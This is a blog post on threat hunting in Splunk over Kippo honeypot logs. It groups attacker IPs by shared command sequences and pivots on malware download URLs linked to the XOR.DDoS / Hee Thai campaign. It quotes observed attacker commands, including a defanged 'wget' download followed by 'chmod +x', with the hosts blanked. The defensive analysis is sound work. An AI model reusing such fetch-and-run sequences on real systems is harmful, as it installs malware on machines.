Identifying Honeypot Attackers' Infrastructure in Splunk

18 March 2015

In this post, we'll cover some searches that help identify the infrastructure the attackers are using. We'll do this by grouping attackers together based on the commands they enter during each session. When several IP addresses run an identical set of commands, it's reasonable to assume they are either controlled by the same attackers or share the same C2 infrastructure and tactics.

We'll start with the search that will show us the attackers using the same commands:

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc by command | sort - dc | fields - dc

Breaking the above search down: first, we specify that we want to look in the kippojson sourcetype. Next, we run a subsearch that returns only the sessions that have a command entered in them. Then we group the events that share a session identifier by running transaction session. Since each session can contain multiple commands, we need to collapse them into a single field value so we can compare it against other sessions; we do this by running nomv command. Next, we get the values of src_ip and the distinct count of src_ip (used to sort in descending order later on), grouped by command. Lastly, we sort on the number of attacker IP addresses and remove that field, since it's only needed for sorting.
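To make the grouping logic concrete outside of Splunk, here is a minimal Python sketch of roughly the same steps. It assumes the events have already been exported as dictionaries with session, src_ip and command keys; the function name and sample layout are made up for illustration. It keeps commands in the order they appear in the input, which may differ from how transaction orders multivalue fields.

```python
from collections import defaultdict


def group_ips_by_commands(events):
    """Group attacker IPs by the full set of commands typed in a session."""
    # Step 1: collect the source IP and commands per session
    # (roughly what `transaction session` does).
    sessions = defaultdict(lambda: {"src_ip": None, "commands": []})
    for event in events:
        entry = sessions[event["session"]]
        entry["src_ip"] = entry["src_ip"] or event.get("src_ip")
        if event.get("command"):
            entry["commands"].append(event["command"])

    # Step 2: flatten each session's commands into one string
    # (roughly `nomv command`) and collect the distinct IPs per string.
    groups = defaultdict(set)
    for entry in sessions.values():
        if entry["commands"] and entry["src_ip"]:
            groups["\n".join(entry["commands"])].add(entry["src_ip"])

    # Step 3: sort by number of distinct IPs, descending (like `sort - dc`).
    return sorted(groups.items(), key=lambda item: len(item[1]), reverse=True)
```

Sessions without any command are dropped, which mirrors the command=* filter in the subsearch.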

Since the number of IPs for some of the command groups is pretty large, I've listed only the top command groups by number of IPs to make the results easier to read:

Commands Count
free -m
ps -x
uname 57
id 56
wget hxxp://
ls -la /var/run/sftp/pid
chmod +x 8002
wget hxxp:// 10
wget hxxp:// 10
wget hxxp:// 10

Looking at the results, we can see that the most common group of commands doesn't really provide us much value. The 169 IPs running free -m; ps -x; uname are most likely doing some sort of recon and nothing more, so pretty boring stuff.

However, the fourth group of commands down shows some interesting stuff.

wget hxxp:// 
ls -la /var/run/sftp/pid 
chmod +x 8002 

The attackers are grabbing malware from, making it executable, and then running it. There are about 12 distinct IP addresses running the same set of commands, which are:

Using a quick little script, we can identify where these IP's are located:
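A script like that can be very small. The sketch below is only an illustration, not the script used for this post: tally_locations and its lookup argument are hypothetical names, and lookup stands in for whatever GeoIP source you have available.

```python
from collections import Counter


def tally_locations(ips, lookup):
    """Count IPs per location using a caller-supplied lookup function."""
    tally = Counter()
    for ip in ips:
        # lookup() is a placeholder for a real GeoIP source; it should
        # return a country name or code, or None when the IP is unknown.
        tally[lookup(ip) or "unknown"] += 1
    # Most common locations first.
    return tally.most_common()
```

Passing the lookup in as a function keeps the tallying independent of any particular GeoIP database or service.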


The malware they were downloading is from the Linux/XOR.DDoS family, used by the Hee Thai campaign, which FireEye did a write-up on. We see this malware being downloaded all the time on our honeypots as well; I'd say a good 20% of the malware we get is a variant of it.

Moving on, we can try to see if these IPs were distributing other malware in the past:

sourcetype=kippojson [ search sourcetype=kippojson src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= OR src_ip= | stats count by session | fields session ] | transaction session | stats count by url
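Typing out a long OR list by hand gets tedious, so here is a small Python sketch that builds this kind of pivot search from a list of indicators. The helper name and its parameters are made up for illustration, and the quoting rule (backslash-escaping embedded quotes) is an assumption worth checking against your Splunk version before relying on it.

```python
def build_pivot_search(field, values, by_field, sourcetype="kippojson"):
    """Build a session-pivot search string for a list of indicator values."""
    if not values:
        raise ValueError("need at least one value to pivot on")

    def quote(value):
        # Wrap in double quotes and escape embedded backslashes and quotes
        # so that URLs and other odd values stay in one token.
        return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'

    clause = " OR ".join(f"{field}={quote(v)}" for v in values)
    return (
        f"sourcetype={sourcetype} "
        f"[ search sourcetype={sourcetype} {clause} "
        f"| stats count by session | fields session ] "
        f"| transaction session | stats count by {by_field}"
    )
```

For example, build_pivot_search("src_ip", ips, "url") produces a search shaped like the one above, and swapping the arguments to ("url", urls, "src_ip") produces the reverse pivot from URLs back to IPs.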

Turns out they did, and the other files they downloaded were:

If we didn't already know these were part of the Hee Thai campaign, we would begin by doing some research on these IPs. A good start would be VirusTotal and their IP report here, which gives us the passive DNS records seen, as well as URLs and malware previously downloaded from this IP.

Another thing we can do, now that we know the URLs the malware is downloaded from, is see who else is downloading it. Our initial search only matched sessions with the same full set of commands; this search matches any session that fetched one of the malware URLs, regardless of the other commands:

sourcetype=kippojson [ search sourcetype=kippojson url= OR url= OR url= OR url= OR url= OR url= | stats count by session | fields session ] | transaction session | stats count by src_ip

The above search will give us these IPs:

So, we just gained an additional 8 IP addresses that are distributing this malware. We can add these to our list of IOCs and start investigating the new ones.
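Working out which addresses are actually new is just a set difference between the pivot results and the list we already had. A minimal sketch, assuming both lists are plain strings exported from the searches (the function name is made up for illustration):

```python
def new_indicators(known_ips, pivot_ips):
    """Return IPs found by the URL pivot that are not already known IOCs."""
    # Strip stray whitespace so copy-pasted values compare cleanly.
    known = {ip.strip() for ip in known_ips}
    found = {ip.strip() for ip in pivot_ips}
    # Sorted as plain strings so the output is stable between runs.
    return sorted(found - known)
```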

One last bit of interesting information, which isn't new but which we can confirm in our logs: the Hee Thai campaign uses one subnet to scan the internet and gather the credentials for each system, then uses other IP addresses to do the actual logging in.

I was able to validate this by looking at who logged into my box with only the correct password, and no other attempts. The first IP I found logged into my box with my password and no other guesses. Granted, it's an easy password; however, if we look at the other times we see this guy...

sourcetype=kippojson [ search sourcetype=kippojson src_ip="" | stats count by session | fields session ] | transaction session | stats count by eventtype

The above search looks for all the sessions from that IP and counts the eventtypes, which are either "login_success" or "login_attempt". We get 21 login_success events with no failures. Pretty interesting, right?
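The same check can be run across every IP at once instead of one at a time. The Python sketch below assumes events exported as dictionaries with src_ip and eventtype keys, and assumes that "login_attempt" marks a failed guess, as the counts above suggest; the function name and the min_successes parameter are made up for illustration.

```python
from collections import Counter, defaultdict


def success_only_ips(events, min_successes=1):
    """Return {ip: success_count} for IPs that logged in without any failures."""
    counts = defaultdict(Counter)
    for event in events:
        counts[event["src_ip"]][event["eventtype"]] += 1
    return {
        ip: c["login_success"]
        for ip, c in counts.items()
        # Assumption: "login_attempt" events are failed guesses.
        if c["login_success"] >= min_successes and c["login_attempt"] == 0
    }
```

Any IP this returns already knew the password on its first try, which is what we'd expect from the addresses that do the logging in rather than the scanning.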